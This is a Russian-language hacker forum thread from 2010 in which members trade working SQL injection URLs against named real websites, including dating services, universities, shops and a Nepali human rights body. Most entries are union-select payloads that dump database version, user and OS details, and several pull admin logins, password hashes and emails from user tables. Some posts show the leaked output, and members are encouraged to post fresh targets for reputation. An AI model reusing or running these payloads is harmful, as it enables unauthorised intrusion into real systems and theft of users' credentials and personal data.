http://www.kulturkompasset.com/index.php?AID=1015&TID=-7+union+select+1,concat_ws(0x3a,user(),version(),d atabase(),@@version_compile_os),3--
PR-5
911love сайт знакомств
http://www.911love.ru/?page=news&itm=-53+and+1=2+union+select+1,2,3,4,5,concat_ws(char(5 8),@@version,user(),database(),@@version_compile_o s),7,8,9,10+--
version : 5.0.22
user : www911love_main@localhost
database : www911love_main
os : redhat-linux-gnu
http://www.911love.ru/?page=news&itm=-53+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,n ame,password,email),7,8,9,10+from+911love_dating_u ser--
можно ещё поковырять
Code:
http://www.black-cat.ru/cat/articles.php?id=-56+union+select+concat_ws%280x3a,@@version,user%28 %29,database%28%29%29%20--
version : 5.0.82-log
user: blackcat@cub.mplik.ru
database: blackcat
вывод в title
Еда!
www.utep.edu
http://www.herbalsafety.utep.edu/facts.asp?ID=12+union+select+1,2,3,4,5,6,7,8,9,10, 11,121,3,14,15,16,17,18,19,20,21,22,23,24,25,26,27 +from+msysaccessobjects
Ms_Access
PR-8
тИЦ-140
-----------
www.apsu.edu
http://www.apsu.edu/News/show_news.asp?id=4150+union+select+1,2,3,4,5,6,7+f rom+msysaccessobjects
Ms_Access
PR-6
тИЦ-50
-----------
www.yu.edu
http://www.einstein.yu.edu/home//news.asp?id=262+or+1=@@version
MS_SQL
PR-7
тИЦ-200
BlackFan
27.06.2010, 18:20
ама.рф
Code:
http://ама.рф/index.php?i=-1+union+select+null,null,null,null,null,null,null, null,null,_nickname,null,_pass,null,_pass2,null+fr om+web_clients+limit+1+offset+51
PostgreSQL 8.3.1 on i386-portbld-freebsd6.2, compiled by GCC cc (GCC) 3.4.6 [FreeBSD] 20060305
имплозия.рф
Code:
http://имплозия.рф/drugstores/retphoto.asp?code=-3341+union+select+null,null,@@version,null,null,nu ll,null,null,null,null,null,null,null+from+price
Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
динатон.рф
Code:
http://динатон.рф/dntprice-999001630'+union+select+1,2,3,concat_ws(0x3a,user( ),database(),version()),5,6,7,8+--+
user - telegluk@localhost
database - MusicMain
version - 5.0.22
Уважаемые хеккеры! Проверяйте найденные вами скули на дубли, это можно сделать здесь: http://www.google.ru/search?sourceid=chrome&ie=UTF-8&q=site:forum.antichat.ru {HOST_YOU_SQL}. Не стоит вбивать в гугл вашу скулю целиком, ибо часто скули выложенные тут прокручены через другой файл.
Только на последней странице(10 постов) дублей 6 штук.
А те кто ставит репутацию за найденные скули, неполенитесь чекнуть скулю на повтор, стимулируйте хеккеров.
4.1.20
Code:
http://www.venellisport.it/pages/news.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,version()--+
Ночная зона
http://nightzone.ru/seasons.php?id=162+union+select+1,2,concat_ws(0x3a ,nickname,pass word),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42+from+admin s--
http://saransk.nightzone.ru/seasons.php?id=48+union+select+1,2,concat _ws(0x3a,nickname,password),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35, 36,37,38,39,40+from+admins--
http://belgorod.nightzone.ru/seasons.php?id=66+union+select+1,2,concat_ws(0x3a, nickname, password),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+fr om+admins--
http://nvrsk.nightzone.ru/seasons.php?id=1+union+select+1,2,concat_ws(0x3a,n ick name,password),4,5,6,7,8, 9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 ,33,34,35,36,37,38,39,40+from+admins--
http://hotkey.nightzone.ru/seasons.php?id=4+union+select+1,2,concat_ ws(0x3a,nickname,password),4,5,6,7,8,9,1 0,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41+from+admins--
ЛЕНИНГРАДСКАЯ кондитерская фабрика
http://www.leningradskaja.ru/?sublist=61&news=-12+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,@@v ersion,user(),database(),@@version_compile_os),6,7 ,8,9+--
version : 5.0.90-community
user : eningr_dima@localhost
database : leningr_zefir
os : unknown-linux-gnu
http://treeofmoney.ru/pour.php?id=-151752+union+select+1,user (),3,version( ),5--
http://heartmir.ru/write.php?id=-876+union+select+1,version (),3 ,4--
http://stairsoflove.ru/write.php?id=-123+union+select+1,user( ),3 ,version(),5,6--
http://moy-snegovik.ru/write.php?id=-123+union+select +1,user(),3,v ersion(),5,6--
служба секс знакомств
http://www.narazdva.ru/?do=userinfo&id=-545198+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,concat_ws(char(58),@@version,user(),d atabase(),@@version_compile_os)+--
version : 5.0.22
user : admin_admin@localhost
database : admin_narazdva
os : unknown-freebsd6.0
ТИЦ 20 ПР 5
http://www.walkingcity.ru/article.php?art_id=120+union+select+concat_ws(0x3a ,login, pass),2,3 ,4+from+admin--
jecka3000
29.06.2010, 11:07
http://www.rampco.info/index.php?id=-11+union+select+1,2,concat(username,0x20,password, 0x20,access),4,5,6,7,8,9,10,11+from+tbl_rampco_use rs+limit+0,1--
Code:
http://www.indexuniverse.com/index.php?option=com_books&task=showDetail&Itemid=36&catid=-38+UNION+SELECT+1,concat_ws%280x3a,user%28%29,vers ion%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30%20from%20jos_users--
Username: admin@localhost
Version: 4.1.22-standard-log
Database: indexuniverse_redesign_com
Google PR: 5
http://www.nm.cz/sluzby-detail.php?f_id=-31+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database(),@@version_compile_os),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20
PR-7
тИЦ-50
------
http://www.locationguide.fi/print.php?p=location&id=-65+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,concat_ws(0x3a,user(),version(),d atabase(),@@version_compile_os),22,23,24,25,26,27, 28,29+from+information_schema.tables+where+table_s chema=CHAR(115,101,105,108,111,114,105,102,105)--&img=
PR-4
------
http://www.teos.fi/en/authors.php?id=-36+union+select+1,2,3,4,5,6,7,aes_decrypt(aes_encr ypt(version(),1),1),9,10,11,12&start=a
PR-5
------
http://www.koulukino.fi/index.php?content=elokuva&id=-162+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19
PR-6
-----
http://www.esat.kuleuven.be/scd/person.php?persid=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34--
-----
http://www.vup.hr/index.php?file=pages/rubrika.php&id=-17+union+select+1,2,3,4+from+information_schema.ta bles
PR-6
------
http://www.rentacar-zagreb.com/pop-detalji.php?id=-132+union+select+1,2,version(),4,5,6,7
PR-3
------
http://www.omantourismcollege.com/newsdetail.php?id=3+union+select+1,2,3,4,5,6+from+ information_schema.tables--&flag=newstore
PR-3
http://kolodets-jelaniy.ru/pour.php?id=-151752+union+select+1,user%20%28%29,3,version%28%2 0%29,5--
http://www.rmfn-sa.com.au/content_sub.php?id=-48+union+select+1,2,3,4,5,6
http://www.mos.com.np/description.php?id=100+and+1=0+union+select+1,2,3, 4,5,group_concat(userName,char(58),Password),7,8,9 ,10,11+from+admin
PR-6
интересно то что на сайте есть статья про SQL Injection
http://www.mos.com.np/description.php?id=120
---------
http://www.nhrcnepal.org/project1.php?ProjNo=2+union+select+version(),2
PR-5
http://citadel-kostroma.ru/catviewarm.php?catarm_id=-2+and+1=2+union+select+1,2,3,4,5,6,7,8,concat_ws(c har(58),@@version,user(),database(),@@version_comp ile_os),10,11,12,13,14,15,16,17,18+--
version : 5.0.32-Debian_7etch12-log
user : kostroma_cit@77.221.130.2
database : kostroma_cit
os : pc-linux-gnu
Code:
http://velospeed.ru/catalog.php?id=-91996+union+select+1,2,concat_ws%280x3a,user%28%29 ,version%28%29,database%28%29,@@version_compile_os %29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20--
user : velosped_root@localhost
version : 5.1.46
database : velosped_main
os : unknown-linux-gnu
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot